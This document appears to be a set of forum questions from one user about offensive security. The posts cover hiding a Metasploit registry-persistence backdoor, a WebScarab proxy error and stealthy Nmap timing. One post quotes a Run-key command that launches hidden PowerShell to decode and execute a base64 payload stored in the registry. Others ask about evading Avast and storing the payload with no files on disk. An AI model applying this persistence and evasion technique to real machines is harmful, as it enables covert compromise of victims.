Vurraz

Thank you so much. This worked. No windows is seen. I'm so grateful. I created invisible.vbs, which runs together with something.bat. The bat file is the reg key command (%COMSPEC%...). But now it seems that I will have to edit the registry_persistence.rb exploit to automatically upload invis.vbs and something.bat to the vicitm PC to make this work... Is this going to trigger the antivirus? What about Avast? Do you have a cleaner solution in mind, instead of uploading 2 files to the victim? Is it possible to write the .vbs and .bat source code DIRECTLY into the registery key, so that no file needs to be uploaded? If so, please show me how.

Hello, I installed a registry_persistence backdoor on my lab machine. However, the problem is that once the victim machine boots, you can see an empty cmd prompt shell standing there for 10 seconds. And if I close that shell, then I won't get a meterpreter shell on my Kali machine. I wish to completely hide that shell on startup, to make the backdoor stealthy. I tried tinkering with the options in the registry key, but it didn't help. This is the data written to the registry key of the backdoor by default: (HKCU/Software/Microsoft/Windows/CurrentVersion/Run) %COMSPEC% /b /c start /b /min powershell -nop -w hidden -c "sleep 0; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item 'HKCU:Software\8GU6R71p').GetValue('Jg8XwoGx'))))" I'm testing this on Windows 7 Enterprise.

Hello, I've tried using webscarab today to try to crawl a website... I've noticed that webscarab uses 127.0.0.1:8008 as a proxy so I've set my Iceweasel browser proxy appropriately and when I tried navigating to the target website I've received this error in my browser, how do I fix it? Please notice that I've replaced the actual domain name with 'xx' for discretion.. WebScarab encountered an error trying to retrieve GET xx Host: xx User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: xx Cookie: __cfduid=db03a54a38722d4dbc1fdca62cdd39c031450900438; __utma=169678269.239294492.1450900443.1450900443.1450907363.2; __utmz=169678269.1450900443.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=her04reoorrl33fe2isrf8hka1; __utmb=169678269.15.10.1450907363; __utmc=169678269; __asc=afdea951151d0d5e16a3fb78073; __auc=afdea951151d0d5e16a3fb78073 Connection: keep-alive Cache-Control: max-age=0 The error was : No appropriate protocol (protocol is disabled or cipher suites are inappropriate) at sun.security.ssl.Handshaker.activate(Handshaker.java:470) at sun.security.ssl.SSLSocketImpl.kickstartHandshake(SSLSocketImpl.java:1450) at sun.security.ssl.SSLSocketImpl.performInitialHandshake(SSLSocketImpl.java:1320) at sun.security.ssl.SSLSocketImpl.writeRecord(SSLSocketImpl.java:721) at sun.security.ssl.AppOutputStream.write(AppOutputStream.java:122) at java.io.BufferedOutputStream.flushBuffer(BufferedOutputStream.java:82) at java.io.BufferedOutputStream.flush(BufferedOutputStream.java:140) at org.owasp.webscarab.model.Request.writeDirect(Request.java:233) at org.owasp.webscarab.model.Request.writeDirect(Request.java:214) at org.owasp.webscarab.httpclient.URLFetcher.fetchResponse(URLFetcher.java:242) at org.owasp.webscarab.plugin.openid.OpenIdHTTPClient.fetchResponse(OpenIdHTTPClient.java:59) at org.owasp.webscarab.plugin.saml.SamlHTTPClient.fetchResponse(SamlHTTPClient.java:94) at org.owasp.webscarab.plugin.proxy.CookieTracker$Plugin.fetchResponse(CookieTracker.java:130) at org.owasp.webscarab.plugin.proxy.BrowserCache$Plugin.fetchResponse(BrowserCache.java:101) at org.owasp.webscarab.plugin.proxy.RevealHidden$Plugin.fetchResponse(RevealHidden.java:100) at org.owasp.webscarab.plugin.proxy.BeanShell$Plugin.fetchResponse(BeanShell.java:229) at org.owasp.webscarab.plugin.proxy.ManualEdit$Plugin.fetchResponse(ManualEdit.java:243) at org.owasp.webscarab.plugin.proxy.ConnectionHandler.run(ConnectionHandler.java:223) at java.lang.Thread.run(Thread.java:745)

Oh, and another question came to mind - Am I going to be less stealthy if I use multiple T1 scans at the same moment? (Like a -T1 sS scan in one terminal, and a -T1 -sU scan on another terminal within the same computer)

Hello, I've got one simple question - Is Nmap using up less bandwith from my connection if I set Nmap to work on -T1 speed? Thanks in advance!